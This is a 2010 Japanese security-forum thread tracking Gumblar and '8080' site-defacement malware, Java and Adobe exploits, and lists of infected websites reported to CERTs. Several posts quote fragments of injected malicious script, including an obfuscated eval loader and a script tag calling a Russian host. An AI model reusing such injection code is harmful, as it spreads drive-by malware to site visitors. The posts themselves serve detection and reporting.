【ＶＢ】ウィルスバスター2011【クラウド】
http://hibari.2ch.net/test/read.cgi/sec/1286803659/

swfobject●jsが切れたので魚拓等
ttp://megalodon.jp/2010-1011-1611-42/www.dan.co.uk/viewsource/index.php?url=http://sales-agency.jp/flv/swfobject%2Ejs
ttp://jsunpack.jeek.org/dec/go?report=f1ea966d8de496b7f53a06c0f08549ab5886f4b5
ttp://megalodon.jp/2010-1012-0104-37/gw.aguse.jp/captured_images/b4a9dcc6bea6a68e3b979ea0145e67dfed4ef1b6-0.png

caroll-amadea.bl0gger.eu/100531/p2/

1〜6の頃の住人だったけど、もうペース落ちてきたね。

諸々の対策が効果を出してきたか、改ざんが分かりにくくなったか？

パスワードの強制変更がよかった
[止まらぬサイト改ざん(1) ISPがガンブラー対策〜パスワードリセット敢行も]
http://www.so-net.ne.jp/security/news/library/2248.html
[　止まらぬサイト改ざん(3)：全ユーザー「FTPパスワード強制変更」の効果]
http://www.so-net.ne.jp/security/news/library/2278.html

sakuraは1月と比べて241→ 770と増えてるみたいだけどね
ttp://mimizun.com/log/2ch/sec/1263822552/855

> ・aguse
> ttp://www.aguse.net/

糞仕様になったな

Janeのコマンドで見れないなと思ったら

最近めっきり話題無いなｗ
もういいのか？

改竄攻撃は攻撃者の気分次第だから何とも･･･
MicroAdみたいのはいつでも起こりうるから｢もういい｣なんてなしす

gumblar → 活動継続中、相変わらず日IPは弾かれる
8080 → 先月から活動が鈍い感じ? 今週は小康状態

今は日本のIPアドレスは弾くのか・・・
感染するような奴はいつもだいたい同じだから
新しい感染者を出すには別の国を短期集中的にやるのか？

[ゲームのニュース/ショップでの状況等のブロク] ファミコンプラザゲーム最新情報ページ
p://www■famicom-plaza■com/blog/

10月18日 AM5:00頃〜AM11:00 にサイトに訪れた人にガンブラーの感染の疑い有りだそうです。
現在は上のページは復旧しているようです。

http://nes3◎com/beutyeh/beh1/index◎htm
http://xyz111◎k2◎xrea◎com/comic/
http://click-no1◎jp/kp-unescape◎html
http://amyou◎net/pet/?feed=rss2
http://www◎marucen◎co◎jp/main◎html
http://www◎citydusk◎com/

失敗例含むかも

古い型が多いな

[エフセキュアブログ : そのApacheのモジュールは本物ですか？]
http://blog.f-secure.jp/archives/50455216.html
.soファイル↓とやらを利用する亜種があるそうな

[動的共有オブジェクト (DSO) サポート - Apache HTTP サーバ]
http://httpd.apache.org/docs/2.0/dso.html

>397
click-no1 はY知恵袋の質問文を引っ張ってきたものなので改ざんされてない
（ワードサラダなごみサイトだが）

Kasperskyのサイト改ざん　ユーザーを偽サイトに転送
http://www.itmedia.co.jp/news/articles/1010/20/news060.html

カスペった

>>401
隠蔽とか、完璧にオワタｗｗｗｗ

ウィルス対策ソフトの会社が改ざんされ
それを隠蔽するも改ざんされてた事がバレる
信頼度0%になってしまった

ESETの仲間入りだなｗ

オパーイ詐称CMなんか流してる場合じゃねぇｗ

AKBという白アリ寄生虫なんかをCMに使うからだ

国内100社以上で感染被害を確認。”mstmp” ”lib.dll” のファイル名で拡散する不正プログラム
ttp://blog.trendmicro.co.jp/archives/3723

ttp://www.rbbtoday.com/article/2010/10/25/71502.html
ttp://journal.mycom.co.jp/news/2010/10/25/041/

>>408の情報って、あんま無いね。

まぁ既にありふれた物になっちゃったgumblar/8080の亜種だしねぇ

ユーザーに対しては、「OS、アプリケーションを最新の状態にする」
「最新バージョンのセキュリティソフトを導入し、最新の状態に保つ」という2点を
改めて徹底するよう呼びかけている。
ttp://internet.watch.impress.co.jp/docs/news/20101025_402502.html
Javaの脆弱性を悪用する不正プログラム「JAVA_AGENT.P」

JREが1.6.0_22ならmstmpはダウンロードすらされないらしいと聞いた。

>>408
これってマイクロアドのヤツか？
GIGAZINEでは'Security Tool'の他に
メディアプレーヤ、pdf、JARの脆弱性も利用されたみたいだし

「mstmp」系ウィルス補完計画
ttp://d.hatena.ne.jp/connect24h/comment?date=20101022

ガンブラー流行ったのって去年の12月前後だったよね。
全然収束しなかったね。ガンブラーに関しては警察も動く的な記事を読んだ気もするけど・・

インターネット絶滅に都合がいいから放置してるんじゃね

GumblarとConfickerの戦い
ttp://www.youtube.com/watch?v=wpxcCKYvDsc

2010年上半期までは6:4とGumblar優勢だったはずが、
下半期に入りCon­fickerが逆転し、王者交代が行われた模様

だそうで(企業の話で一般家庭の話ではないみたい)

ttp://dougikai-jimin.jp/

このまま進化すると最終的に生活インフラにまで悪影響を及ぼしかねない勢いだ
実は産業にダメージを与えるための兵器なのかもしれんな

おれんところは、記憶力が落ちた祖母のところにあるＰＣの感染が不安だがな
ほんと、よくできたウィルスつくりやがって

新しいウィルスは、上記の対策でいまのとこＯＫ？

どれのこといってんのかわからんけどだいたいおｋ
基本が大事なのです
各ソフトウェアのバージョンはちゃんと確認しなおしてね！

>>421
国内100社以上で感染被害を確認。？mstmp？ ？lib.dll？ のファイル名で拡散する不正プログラム
ttp://blog.trendmicro.co.jp/archives/3723

ttp://www.rbbtoday.com/article/2010/10/25/71502.html
ttp://journal.mycom.co.jp/news/2010/10/25/041/
上記のウィルス
一応、ＪＡＶＡは、最新版、導入しました

攻撃プログラムがJREのバージョンを見て、対象の脆弱性があるバージョンの場合は攻撃開始。
最新版を含む対象の脆弱性がないバージョンの場合は何もせずスルーするらしい。

>>420
古いJREが残る場合もあるようだから消しとくといいのかも。

>>413
> これってマイクロアドのヤツか？

マイクロアドじゃなくて、どこかのアクセス解析サービスらしい

アクセス解析サービスを使用した Web サイト経由での攻撃に関する注意喚起
ttp://www.jpcert.or.jp/at/2010/at100028.txt

そのアクセス解析サービスはどこなんだろう？

本来は、そこをきちんと公開するべきじゃないのかな？

[「mstmp」系ウイルス(仮称) に感染しているか確認する方法 ？ にわか鯖管の苦悩日記]
ttp://kikuz0u.x0.com/blog/?p=644

>>426
既に分かってるんだけど、JPCERTが言わないからまだ野放しにされている。
指摘を受けたところは調査中らしいけど。
↓
http://d.hatena.ne.jp/connect24h/comment?date=20101022

知ってる人は匿名掲示板(笑)とかどこかに書いてもいいのにね
アクセス解析というとxreaは昔やられてたな

知ってる人は知ってるからじゃね？

[36億スパム配信の凶悪ボットネットが解体 G DATA]
http://gdata.co.jp/press/archives/2010/10/36.htm

↓スクリプトでリダイレクトされるファイルが昨日も更新されてる
netdekase5●sakura●ne●jp
shimadaaqua●sakura●ne●jp
umeshin●sakura●ne●jp

いきなり襲ってきた「mstmp」ウィルスに大わらわ
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20101027/353496/

413,428に引用されているblogの人が、経緯について詳しく説明している

>>431
G DATAが言ってるのはGumblar 8080系の事で、Gumblar.xはまだ生きてるらしい

Gumblar.xも日本弾きは継続中らしいから
海外の串でも使わんと影響ないだろ

取扱注意
www●mypondstore●com/ThumbnailFrame●htm
↓
＜script＞var XepaZerc='･････

今騒いでるのはコイツだろ？

flashplayerもjavaもMSUPDATEから出来ればもっと被害者減りそうなもんだが

>>431
8080の方は更新止まってる
Gumblar.xが挿入してる「〜php」の部分が絶賛更新中

Adobeの脆弱性が来たよん

Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
Release date: October 28, 2010

Flash Playerはby November 9, 2010
Adobe Reader and Acrobatはduring the week of November 15, 2010

ttp://www.adobe.com/support/security/advisories/apsa10-05.html

いっそのことFlashもクラウド化すりゃいいのに…
アップデートめんどい

>>439
イミフ

また勘違いクラウドかw

脳みそもクラウド化

“クラウド型”のウイルス対策ソフトってぶっちゃけどうなの？
http://hato.2ch.net/test/read.cgi/news/1288319125/

クラウドｗ
セフィロスｗ

http://hato.2ch.net/test/read.cgi/news/1288319125/32
catv?の人は去年から　ここの感染URLを張り続けてますよね

そういう仕事なの？セキュリティ関連会社とか

まぁほとんど狙われないんだけどついでに
Shockwave Player 11.5.9.615
ttp://www.adobe.com/support/security/bulletins/apsb10-25.html

http://hissi.org/read.php/news/20101029/eWZwdmtCbnQw.html
http://hissi.org/read.php/news/20100923/RVFMTXcvWlow.html

スレ立て依頼してウイルスリンク張るのが
最近のスタイルなのかしら

>>438
■【ゼロデイ攻撃】Adobe Reader/Flash Playerの未修整の脆弱性狙うトロイの木馬
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2391
>Adobe Reader/Acrobat 9.4およびそれ以前のバージョン
>Flash Player 10.1.85.3およびそれ以前のバージョン

■APSA10-05: Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat(セキュリティホールmemo)
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/10.html#20101029_Flash

今年何回目のゼロデイだよｗ

ゼロデイの多さは人気の証(ｷﾘｯ
なのにFlashを排除するAppleはおかしい

アドベはもう本気で死ねよ
やる気無いならさっさと辞めちまえ！

もうsilverlightでいいよ

>>442
激しくワロタｗ

ここまで執拗に adobe が狙われるのって、流石に何らかの意図を感じるね…

何の利害関係も無いｽｰﾊﾟｰﾊｶｰが、狙いやすいからやってるとかの問題じゃないような気がするんだけど…

狙われてるのは利用者が多い上に脆弱性があるからだよ

日数が経てばセキュリティソフトが対応するから、
ゼロデイ放置のほうが安全なような気がしてきたｗ

そんなわけないだろアホか

>>455
http://internet.watch.impress.co.jp/docs/news/20101029_403477.html
>Flash Playerでは、Windows/Macintosh/Linux/Solaris版のバージョン10.1.85.3以前と、Android版の10.1.95.2以前が影響を受ける。

オレーシャ･ソロキナ豚が何たらこうやらｗｗｗ

フジテレビで特集中

親が喧嘩ふっかけてきて、ろくに見れんかった

やっぱyoutubeやニコニコも狙われてるのかな？

Flash Playerの脆弱性狙いはFIREFOXの場合はStop AutoplayかFlash Blockで
flashを遮断すれば大丈夫なのでしょうか？

>>462
意味茄子

Flash Playerアンインスコおすすめ

>>462
Flash Playerは代替品が無いというのが痛いなｗ

さっさとHTML5（笑）標準化しろよ
まあそうなると98以前では動画とか見れなくなるが…

国内の多数サイトに影響、JRE悪用するウイルス感染について注意

株式会社ラックは10月29日、国内の多数のサイトで発生したガンブラー型攻撃による
ウイルス感染の実態について、特徴や手口の傾向が判明したとして、注意喚起を公表した。

ウイルスが接続を試みるIPアドレスは、以下のアドレス。
［64.27.25.223］、［64.27.25.224］、［88.80.7.152］、［85.17.209.3］、
［95.211.111.229］、［95.211.108.93］、［178.63.62.19］
http://internet.watch.impress.co.jp/docs/news/20101101_403962.html

↑
>今回確認された攻撃ではJava Runtime Environment（JRE）の脆弱性（CVE-2008-5353）を悪用することが確認された。
>ラックでは、多くの組織で社内システムやパッケージソフトに付属するそれぞれのJREを使用しているケースが見受けられ、
>そのためにJREのセキュリティ対策を適切に取れず、被害が相当数の企業に拡散していることが推測されるとしている。

CVE-2008ってことは2年前かと思ったら[CVE-2010-0094]もあるらしい

[アフィリエイトによる金銭取得が目的か!? −“mstmp””lib.dll”攻撃続報 | トレンドマイクロ セキュリティ ブログ]
http://blog.trendmicro.co.jp/archives/3728

CVE-2010-0094でも3月のJava6Update19で修正されているんだから
半年も放置して感染したボンクラが救いようもないことにかわりはない

【GENOウイルス注意！】Java（JRE）の脆弱性を悪用するウイルス感染の特徴や手口が判明した模様
http://hato.2ch.net/test/read.cgi/news/1288588760/

>>470
>>447
ttp://hissi.org/read.php/news/20101101/SlRWS2IyRlcw.html

JAVA入れてなかった

超CGｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

誤爆したすまん

Gumblar8080攻撃のその後 〜Bredolabは本当に死んだのか〜
https://www-950.ibm.com/blogs/tokyo-soc/entry/gumblar8080_20101102?lang=ja

「8080は滅びぬ、何度でも蘇るさ」

skyhigh-read●com/

ブラウザとavastが反応
これはガチ？

>>476
>>475
■オランダ当局がBredolabボットネットを閉鎖〜関連不明も8080系攻撃は停止中
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2393

突っ込まれてるコード(URL)は現時点では無害。
・・だが、この先どうなるかは誰も知らん。

470のスレがDAT落ちしているようだが続きが気になる

>>477
把握

>>478
これのこと
genoウイルスとかなってるがぜんぜん関係ない
tp://blogs.yahoo.co.jp/noooo_spam/60457929.html

>>480
ありがとう

>>480
>ぜんぜん関係ない
その記事には「ガンブラー型攻撃」って書いてあるし
Gumblarで盗まれたアカウントが使われたかもよ

多サイトにスクリプトを置く、価値の高いアカウントだから変化をつけたとか
マイクロアドのも似てるし

http://gw.aguse.jp.nyud.net/?aguse_&aguse_url=http://hoodrugs.com/
>悪者は盗んだアカウント情報を“温存”している？

ごめん、「その記事」じゃなくて>>470の元ネタの記事だった

[【要注意】現在「ウェブ魚拓」がウィルスに感染している模様 : 馬鹿の野望ｂｙはなゆー]
ttp://kitamakura.seesaa.net/article/168211287.html

まー　マジであっちこっちに感染してるなー
ほんとに仮想PCでネットすること考えないとダメかこりゃ

おかしいと思ったらこのざまorz
魚拓踏みまくってるしｗ

>>484
ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの？

感染してたら
そのまま保存されるからな

魚拓を取ろうとするとエラーが出たり
表示できても時間を置くと見れなくなる

10月31日以降の魚拓が見れない異常事態
http://megalodon.jp/pc/history/20101031
http://megalodon.jp/pc/history/20101101

"Nine-Ball"ってGumblar型の攻撃だと思うけど
魚拓に対しての攻撃みたいだ

infoseekの無料版が終了する影響で負荷増加とかにしても期間長いしね

ガンブラー？ウェブ魚拓が感染　　　　　　か
http://hato.2ch.net/test/read.cgi/news/1288846500/

ウェブ魚拓スレより
91 名無しさん＠お腹いっぱい。 [sage] 2010/11/04(木) 20:21:19 ID: Be:
株式会社アフィリティー ≫ Blog Archive ≫ ウェブ魚拓がウイルスに感染したという情報が流れている件につきまして
http://www.affility.co.jp/archives/229

>>492

リンク先より一部抜粋

>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。

>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。

【無】の中の人へ
「ソコ」は.htaccessやられてるみたいだぬ。

＞ちょめちょめ●ru/mymap/

referer：ちょめちょめ●ru/mymap/
→404 Not Found

referer：www.帝國.com/
→iframe ｲﾊﾟｰｲ

危険なので以下略とす

追記
UA見てるから、IE6(笑)とかで凸すｒ(ry

（・３・）　エェー
（・３・）　リファラ当てるの苦手YO

.htaccessかお。。。

あっ誤爆。
【無】の中の人とは違いますお。

>>483
http://internet.watch.impress.co.jp/docs/news/20101101_403962.html
これですか？

株式会社アフィリティー ≫ Blog Archive ≫ ウイルス正体判明
http://www.affility.co.jp/archives/233

一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
〜中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。

これから感染したサイトの魚拓はとらない方が良さそうだね

ウイルスソフト……？

XP使うならJavaもFlashもPDFも無効にしろ、
JavaやFlashやPDF使うなら、Vista以降で保護モード使え
一般社員には管理者権限でログインさせんな

ってことでだいたい防御できるのにね

Flash 10.1.102.64になったよ

そのうちAndroidでも脆弱性つかれたりするんだろう
そうなったら被害が怖いな
ほんとうにFlashはこの先無くなったほうがいいかもね
ジョブズの気持ちも分からんでもない

ジョブズには脆弱性に関してどうこう言う資格がないだろ。
AppleもAdobeに負けず劣らず0-day状態のままほったらかす体質じゃないか。

>>502
トン

chromeだと10,1,103,19 になるんだけどまたすぐ更新が出るのかな

chromeについてくるFlashはgoogleが勝手に更新してくれたような

勝手に更新するんだけどIE他向けに出ているバージョンと違うので差分が気になる
同じバージョンがIE他でも出るのかどうか

たぶん出ない
Googleが好き勝手に改造してるんだろうし、
AppleにボコられてヘコんでるAdobeに
今の強大なGoogle帝国に意見する度胸は無い

>>509
■AdobeがFlashの深刻な脆弱性を解決、Readerに新たな問題発覚
ttp://www.itmedia.co.jp/enterprise/articles/1011/05/news045.html
>これとは別にAdobeは同日、Readerの新たな問題がセキュリティメーリングリストに公表されたことを明らかにした。

このザマだからなｗ

Flash Player更新したらYouTubeの各ユーザーのチャンネルがきちんと見られない・・・

そういうスレじゃない

設定弄ってみれば？

ドメイン見て吹いた
inininininininin●in
comcomcomcomcomcom●com

なんかもう形振り構ってられなくなったのかな…

魚拓の過去分がゴッソリまるごと消えてる
http://megalodon.jp/pc/history

こうなった以上仕方ないだろ

n-yamashita●sakura●ne●jp
lovecosme●sakura●ne●jp/04-05
mirai-inc●net
prim-co●sakura●ne●jp
kajitakashi●sakura●ne●jp
moninet●sakura●ne●jp/ampleur-mania
e-cabinet●sakura●ne●jp/heb

77mail●sakura●ne●jp
barkays●sakura●ne●jp
ontheperch●sakura●ne●jp
sigoto-design●sakura●ne●jp

さくらに数ヶ月前に通報したけど反応なし
スパムメールの転送とか、リンク切れで危険度低

[2年連続で「.jp」は世界で最も安全な国別ドメインと評価 / 株式会社日本レジストリサービス（JPRS）]
http://jprs.co.jp/press/2010/101027.html

万一ゼロデイなどで感染した場合
現在有効な感染の確認方法は無いでしょうか？

ほとんどない

だからみんな困ってる

見つからないようにこっそりやりたいのにそんな簡単に確認できる機構を作るわけないよね

初心者的な意見で意味無いかもしれないけど
駆除はともかく発見だけなら
bitdefenderとEmsisoftEmergencyKitのコマンドラインスキャンと
常駐アンチウイルスソフトによるCドライブのスキャンならいいのでは
対応してれば何とかなると思うけどだめかな

>>522
未知の脆弱性を見つけるような連中だから
主要なウイルス対策ソフトに発見されないように拡散前にチェックしているかと。

未知の脆弱性なんて突かれるようなことはほとんどないよ
ただ修正されてないだけで

脆弱性が発表されると
すぐにそれを付くマルウェアが出てくる
発表しない方が良いくらいにも思える

たいていのセキュリティソフトは新型に対しては後手に回ってしまっているのが実情
セキュリティソフトは必要最低限の備えであって過信していいもんじゃないよ
基本的にはできる範囲で他の対策も行わないと意味がない
といっても回避策のないゼロデイ攻撃が発生しちゃうと正直どうしようもないね
でもだいたい回避策あるけどね

こまめなシステムのバックアップ
それが一番じゃないかな

回避策がないとかあるとか何言ってんだよ
分かってねえくせに知ったかよしてくれ

この間のFlashには回避策はなかったな
現在ゼロデイ中のAdobe Reader(Acrobat)には回避策はあるが
結局は脆弱性の内容によるらからな

き・・脆弱性

>>510
すでに攻撃受けてるみたいだね
それらしい報告あがってたわ

Adobe Readerは初期設定でスクリプトやらマルチメディアやら無効にすればいいのにな。

flashplayerの方のゼロデイはブラウザの設定か他のソフトの設定で無効にしとけばいけるんじゃね？

[Internet Explorerのゼロデイ脆弱性を悪用するドライブ・バイ・ダウンロード攻撃を確認Tokyo SOC Report]
https://www-950.ibm.com/blogs/tokyo-soc/entry/ie-0day_20101108?lang=ja

踏み台にされるWebサイト〜いわゆるGumblarの攻撃手法の分析調査〜
(JPCERT コーディネーションセンター 研究・調査レポート)
http://www.jpcert.or.jp/research/#webdefacement

JSU●○●○●
fb742cde7f13f6aa9678cb7ab0ebac982a527d3d

取扱注意

>ＴＩＡ及び当羽田空港支店はフライトシミュレータ上の架空航空会社（ＶＡ）であります。
f45●aaa●livedoor●jp/~haneda/
→tour1●htm
→staff1●htm
他にも・・・

・がんぶらー
・8080
・＜script＞var XepaZerc=
・＜script＞function 〜
・fff.op.replace (468)
・がんぶらーっぽいの(最下部)

>>537
とりぷるあにつーほ。

aguseのトップページ真っ白なんだけどなんかあったん？

鯖落ちだろ

www●isumiskyhotel●com/
こんなに沢山入っているホテルというのもね。
こんなところに止まったら個人情報心配

>>541
>>541
これは悪質ですね。絞り込んでいませんが、、、
File name: www.isumiskyhotel.com.txt Submission date: 2010-11-22 09:19:37 (UTC) Result: 27/ 42 (64.3%)
http://www.virustotal.com/file-scan/report.html?id=3805f290f0b19e19ec2f4753fcdb5e6001770f05dd6f574a2b1f05685c309a29-1290417577

http://maps.google.co.jp/maps/place?hl=ja&um=1&ie=UTF-8&q=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%
9B%E3%83%86%E3%83%AB&fb=1&gl=jp&hq=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%
AB&hnear=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%AB&cid=10998837259304234162
電凸してみました。

｢ごつごうかけているところはございません｣
｢大丈夫ですよ｣ だそうです。

意味が分かりません。対応終了。

>>541
　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　　 　 　 　 /　,.　-――- ､ l 　 〃
　 ┏┓　 ┏━━┓┏━┓　 　 ┏┓ 　┏┳┓ 　 　　 　 　　　 　 /／: : : : !＼:_:|:_: ＼/ﾊ 　 　 　 　 　 　 　┏┓┏┓
┏┛┗┓┃┏┓┃┗━╋┳┓┃┗━┻╋┛ 　　 ┏┓ 　 　　〃: : :!､: : :|／∨ﾍ : : !ヽ| 　 　 　 　 　 　 　┃┃┃┃
┗┓┏┛┃┗┛┃┏━┻╋┛┃┏┓┏┛┏┓ 　┃┃┏━　ｆ: : |斗-＼|　'下ﾊﾐV h: :!　.━━━━┓ 　┃┃┃┃
┏┛┗┓┃┏┓┃┗┓┏┛　 ┗┛┃┃　 ┃┃ 　┃┃┃ 　　|: : ﾊ　　　　　 ﾏり |: :ﾘ､: ＼ . 　 　 　 ┃ 　┃┃┃┃
┗┓┏┛┗┛┃┃　 ┃┃　 　 　 　 ┃┃　 ┗┛┏┛┃┗━　lﾊﾊい == , . へ 　 |: :l: ､＼: ＼ ＿_━┛ 　┗┛┗┛
　 ┃┃ 　　 　 ┃┃┏┛┃　 　 　 ┏┛┃　 ┏━┛┏┛　 　　　　　 }ﾊ 　 く{　　}／|: :|＼＼＼: : : : ｀＼ 　.┏┓┏┓
　 ┗┛ 　　 　 ┗┛┗━┛　 　 　 ┗━┛　 ┗━━┛　 　 　　　　／;|: |＞ｒ--rf　　|: :l- ､＼＼＼￣｀＼＼┗┛┗┛

>>541
警察に通報したほうが良いと思ふ。

この手の注意を営業妨害だと逆ギレするのが珍しくないくらいのキチガイ業界だからな。

何が悪いのかわからない奴に説明するのはほんと難しいよ

>>541-542
おつぅ。
おしんにメル。

shop-pro●jp/
通販サイトだが
グーグルのセーフブラウジングによると怪しい

>>548
んー今は警告でてないようですが
｢最後に検出されたのは2010-09-21｣となってて時間が立ちすぎとる
＊＊＊.shop-pro.jp のアドレスで個々にショップ運営できるようなので、
その中のどっかが過去にやられたとか?

ヒント：新手のアフィ

>>549
気が付くのが遅れて無念だ
トップページは大丈夫そうだか
これではどこがやられたかかわからん

>>550
他のサイトへのリンク先がやられた可能性もあるな

Windowsに未修正の脆弱性か、権限昇格の恐れ
http://www.itmedia.co.jp/news/articles/1011/25/news026.html

>>548-551
初心者の意見ですみません
私は通販をよく利用するのですが
例えば「＊＊＊.shop-pro.jp」のそこの個人の場所自体がセーフブラウジングで過去にやられてなければ
その通販サイトは現段階までは安全ということでしょうか
私としては更新も対策もしていますが、自分が感染してなくても
サイトの方がやられて個人情報が漏れることも有り得るのですよね？

>>553
特定の個人商店だけが被害にあってただけなら他は問題ない
全体がやられてたならアウト
現時点では被害範囲が判断不能なのでなんともいえない

通販サイトを利用してる時点で個人情報漏洩の危険性は認識してなきゃいけない
絶対安全なサイトなんて無いです

>>553
個人情報に関しては社員・派遣・契約社員が漏えいするという人的危険とこういう技術的危険があるね
トロイなり、Gumblarなりウイルスが仕組まれているのに気付かない、放置してる会社は
技術的にも人的にも個人情報漏えいリスクが高そうだ

>>552
>悪用はローカルでのみ可能

>>549
少なくともshop-pro.jp本家の管理人は2ヶ月の間に対策したのかな？
とにかく杜撰な管理が多いな

http://blog-imgs-45-origin.fc2.com/w/o/r/workingnews/9e09d8cb.jpg

電話用サイトだが、いちおう
shiprip●com/sponge/bob/i/index●html
→<script>var NehQen=
→<script>function aY

新型っぽいの
＜script＞win＝window;gar＝win［'String'］;ga＝'l';g＝win［'eva'+ga］;sf＝ga.rfromCharCode;g（sf（4.5*2,52.5*2,51*2,16*2,20*2･････中略･････））＜/script＞
※装填されてるサイトのURLは非公開とす

>>548
たぶんここだぬ
izu-shizen●shop-pro●jp/

ここ見ればわかるんじゃね？
izu●sakura●ne●jp/
※がんぶらーっぽいのが装填中ｗ

会社にメールしてもISPにメールしても対処しない会社
satokk●co●jp
criminal●co●jp Gumblar.X
motif●jp
www●la-palmedor●com/patis-shop●html　 Gumblar.X

ここなんかは、お薬さんスパムのリダイレクトページがある
i-medical●co●jp/ration73●html

>>561
おしん…

作業に入るお。。。

www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
www●ando-kagu●com
www●fairwayinc●jp
www●heisei-tech●com
tensou●daishin-inc●jp
www●100yen●co●jp
interior-myhouse●com
royal-cbj●jp
www●ltsgo●co●jp
matsuri●co●jp
www●yamaharu-tosou●co●jp
www●matsudakagu●co●jp←これなんかよく見る家具メーカだけど連絡しても全く無視

>>561
さっきまであったけど一番下404になっちゃたのね。なのでつーほしませんでした。
他、おしんとJPCERT/CC、情報処理推進機構（IPA）セキュリティセンター（ISEC）につーほ。

>>563
うげげ、目が逝っちゃうお。。。

Gumblarじゃないけど、2chにXSS脆弱性が発覚
ttp://qb5.2ch.net/test/read.cgi/operate/1290578495/859

でも、Vista＋IE8だと、IEがXSSを検出してスクリプトの動作を制限するので影響うけず
IE7以下やFirefixだとアウト？

>>541は表示されなくなってるね

>>561
一番下、今繋がった。
飛び先はチェックサイトを蹴っている模様。
おしんとかにつーほ。

www●rctank●jpはまだ感染放置かよ

ドムスで商品を注文しようという方はご注意ください！
www*geocities*jp/feb1710/index*html
====
こんな書き込みもあるくらいだから本人は何もしないのでしょう。
デジロックでなければ、こんなサイトは表示停止にしてもらえる
のだが。。。。

Windowsにシステム権限を奪取される脆弱性--すでに攻撃も確認
ttp://japan.cnet.com/news/business/story/0,3800104746,20423501,00.htm

Microsoft Windows のRtlQueryRegistryValues() 関数におけるレジストリデータ検証不備の脆弱性
ttp://jvn.jp/cert/JVNVU529673/
>2010年11月29日現在、対策方法はありません。

どうすんだよこれｗｗｗ

COMODOとかSSMとかで対象のレジストリキーを監視するようにすればよかろう。

Malware Defenderでもいいな

理屈だけの妄言で対処ですかｗ

↑何も出来ない奴

よくわかんない！悔しい！とりあえず煽っとけ！

…ってことだろｗ

マスターペニス

java＆Flashきればおｋ、なんて利便性を大きく損なうアホな対策法に比べりゃ
キー監視なんてまだ有情だな

すまんageた
巻き添え規制が長かったもんで・・・

専ブラ使いましょうや

取扱注意

ダイワ包材株式会社
www●daiwa-pf●co●jp/
↓
＜script＞var QaSehalo=2
＜script＞function aY

おしんつづくなぁ。。。

>>580
おちゅ。
そこのメアドと鯖缶とおしんとJPCERT/CCとIPAとNTT-CERTにつーほ。

あぁ、「index●html」、「index●htm」、「newpage」とか13ページのほかに
サイト内検索したら、まだいぱーいあたぁ。。。orz.....

取扱注意

絶賛放置中につき再掲載
www●snowfan-mimo●com/area/area-service●asp?sID=500 など

絶賛放置中なゴミサイトは消滅すべき

久々にyoutubeをセーフブラウジングでチェックしたらなんかあるみたいだな
あれはyoutubeの広告のリンク先のサイトでもやられたのか?

http://www.smilebanana.com/archives/2010/12/03-2051.php

FirefoxはAdblock Plusに「http://*.pdf」を放り込んでおけば良い
ゴミだけ蹴って、自分自身でアクセスするものは通してくれるから便利だぞ

>>584
それは初心者の質問スレで聞いた方がよくね？

ここに書くんだからgumbler関係だろう
それを初心者池で蹴るのはこのスレの用途の否定じゃないか？

取扱注意
www48●tok2●com/home/karawasuichi/
↓
・Jsunpack
5f6ec9a74fc14cb25efe818a81cfb9605bda288c
↓
「download●XXXXX●jp/」
※腹筋注意ｗ

>>589 上 tok2につーほー
　　　 下 既にドメインパーキングのような

取扱注意

株式会社　電研端子製作所
www●denken-t●co●jp/eng/qa/qa●asp
※初代(？)Gumblar

日本一の幼稚園　日本一の子育てを応援する津久井幼稚園
www●tkg1152●sakura●ne●jp/photo/200709/070907/img13●html
※初代(？)Gumblar

>>591 上 反応なし
　　　下 反応なし

>>591
乙です。
それぞれつーほしますた。

>>593 過去分も含めて 乙乙

取扱注意
>顛峰グループ（Sofmit Group）は〜〜中略〜〜中国西部においてソフトウェアアウトソーシング業界No.1の企業です。
・求人情報
en●sofmit●com/jp/Career/DetailsSub●aspx
↓
＜script src=ｈｔｔｐ：／／www●errghr●ru/script●js＞＜/script＞
ウイルスバスターと同じく、下から数えてNo.1ということですねｗ


>エクセルテンプレート・ワードテンプレート無料ダウンロード
www4●atpages●jp/kaisya/
※旧8080(難読化)
感染率の高い企業のザルPCを「無料」というエサで釣ってトロイ(無料)をバラ撒いてたのかｗ



どーでも良いけど、禿の検索エンジンが帝國のやつになったら探しにくくなたーよ orz

>>594
ノ
上：こちらの環境ではメルが戻ってきます。JPCERT/CCとIPAに気体
下：atpagesとかにつーほ。

ttp://ameblo.jp/prosperprosper/entry-10713430773.html
さすが「ろりぽ」というとこでしょうかね？

マスターペニス

今更かも知れないが
>>5のテンプレに
これも加えようぜ
Exploit - AVG
ttp://linkscanner.explabs.com/linkscanner/default.aspx

ttp://bcc.dip.jp/
ttp://x68000.q-e-d.net/~68user/Cgi-room/#source
こんなのもあるね

firefoxのABPは
ここの対策も有効か
ttp://ponco2garage.blog111.fc2.com/blog-entry-68.html

>>600
2ヶ月くらい寝てたのか？
冬眠するにゃ早過ぎるような気がするが・・

今現在は、どっかのサーバー(特に広告関連)をハクってばら撒くのが主流だから
確実に防ぐ方法というものは存在しない。


どうしてもADPで防ぎたいならhttp://* ←これを入れておけよｗ
「驚きの白さ」

そういえばmicroadの広告があるサイトを見たら感染したなんて話も前にあったなw

それも>>2-3をきちんとしていれば問題なかったはず。

心配ならadっぽいアドレスをカットしておけよ

＞QuickTime 7.6.9
